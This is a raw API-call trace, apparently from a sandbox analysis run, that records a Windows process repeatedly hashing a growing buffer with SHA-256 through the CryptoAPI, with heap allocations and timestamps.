	[0224.989] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2778eb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778eb0, pdwDataLen=0x128ba4) returned 1
	[0224.989] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.989] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.989] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.990] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.990] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0224.990] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778ed8
	[0224.990] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2778ed8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778ed8, pdwDataLen=0x128ba4) returned 1
	[0224.990] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.990] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.990] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.990] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.990] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0224.990] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778f00
	[0224.990] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2778f00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778f00, pdwDataLen=0x128ba4) returned 1
	[0224.990] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.990] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.990] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.991] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.991] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0224.991] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.991] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778f28
	[0224.991] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2778f28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778f28, pdwDataLen=0x128ba4) returned 1
	[0224.991] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.991] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.991] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.991] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.991] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0224.991] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.991] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778f50
	[0224.991] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2778f50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778f50, pdwDataLen=0x128ba4) returned 1
	[0224.991] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.991] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.991] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.992] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.992] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0224.992] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778f78
	[0224.992] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2778f78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778f78, pdwDataLen=0x128ba4) returned 1
	[0224.992] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.992] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.992] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.992] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.992] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0224.992] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778fa0
	[0224.992] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2778fa0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778fa0, pdwDataLen=0x128ba4) returned 1
	[0224.992] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.992] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.992] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.993] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.993] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0224.993] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778fc8
	[0224.993] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2778fc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778fc8, pdwDataLen=0x128ba4) returned 1
	[0224.993] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.993] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.993] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.993] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.993] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0224.993] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778ff0
	[0224.993] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2778ff0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2778ff0, pdwDataLen=0x128ba4) returned 1
	[0224.993] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.993] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.993] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.994] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.994] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0224.994] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779018
	[0224.994] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779018, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779018, pdwDataLen=0x128ba4) returned 1
	[0224.994] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.994] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.994] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.994] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.994] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0224.994] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779040
	[0224.994] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779040, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779040, pdwDataLen=0x128ba4) returned 1
	[0224.994] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.994] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.994] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.995] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.995] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0224.995] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779068
	[0224.995] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779068, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779068, pdwDataLen=0x128ba4) returned 1
	[0224.995] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.995] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.995] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.995] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.995] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0224.995] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.995] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779090
	[0224.995] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779090, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779090, pdwDataLen=0x128ba4) returned 1
	[0224.995] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.995] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.995] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.996] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.996] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0224.996] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27790b8
	[0224.996] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27790b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27790b8, pdwDataLen=0x128ba4) returned 1
	[0224.996] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.996] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.996] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.996] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.996] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0224.996] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.996] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27790e0
	[0224.996] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27790e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27790e0, pdwDataLen=0x128ba4) returned 1
	[0224.996] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.996] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.996] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.997] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.997] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0224.997] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779108
	[0224.997] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779108, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779108, pdwDataLen=0x128ba4) returned 1
	[0224.997] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.997] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.997] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.997] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.997] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0224.997] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779130
	[0224.997] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779130, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779130, pdwDataLen=0x128ba4) returned 1
	[0224.997] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.997] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.997] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.998] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.998] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0224.998] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779158
	[0224.998] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779158, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779158, pdwDataLen=0x128ba4) returned 1
	[0224.998] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.998] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.998] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.998] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.998] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0224.998] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779180
	[0224.998] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779180, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779180, pdwDataLen=0x128ba4) returned 1
	[0224.998] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.998] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.998] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.999] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.999] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0224.999] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27791a8
	[0224.999] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27791a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27791a8, pdwDataLen=0x128ba4) returned 1
	[0224.999] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0224.999] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0224.999] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0224.999] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0224.999] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0224.999] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0224.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27791d0
	[0224.999] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27791d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27791d0, pdwDataLen=0x128ba4) returned 1
	[0224.999] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0224.999] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.000] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.000] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.000] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0225.000] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27791f8
	[0225.000] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27791f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27791f8, pdwDataLen=0x128ba4) returned 1
	[0225.000] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.000] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.000] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.000] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.000] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0225.000] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779220
	[0225.000] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779220, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779220, pdwDataLen=0x128ba4) returned 1
	[0225.000] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.000] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.000] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.001] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.001] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0225.001] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779248
	[0225.001] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779248, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779248, pdwDataLen=0x128ba4) returned 1
	[0225.001] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.001] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.001] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.001] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.001] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0225.001] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779270
	[0225.001] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779270, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779270, pdwDataLen=0x128ba4) returned 1
	[0225.001] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.001] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.001] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.002] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.002] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0225.002] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779298
	[0225.002] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779298, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779298, pdwDataLen=0x128ba4) returned 1
	[0225.002] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.002] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
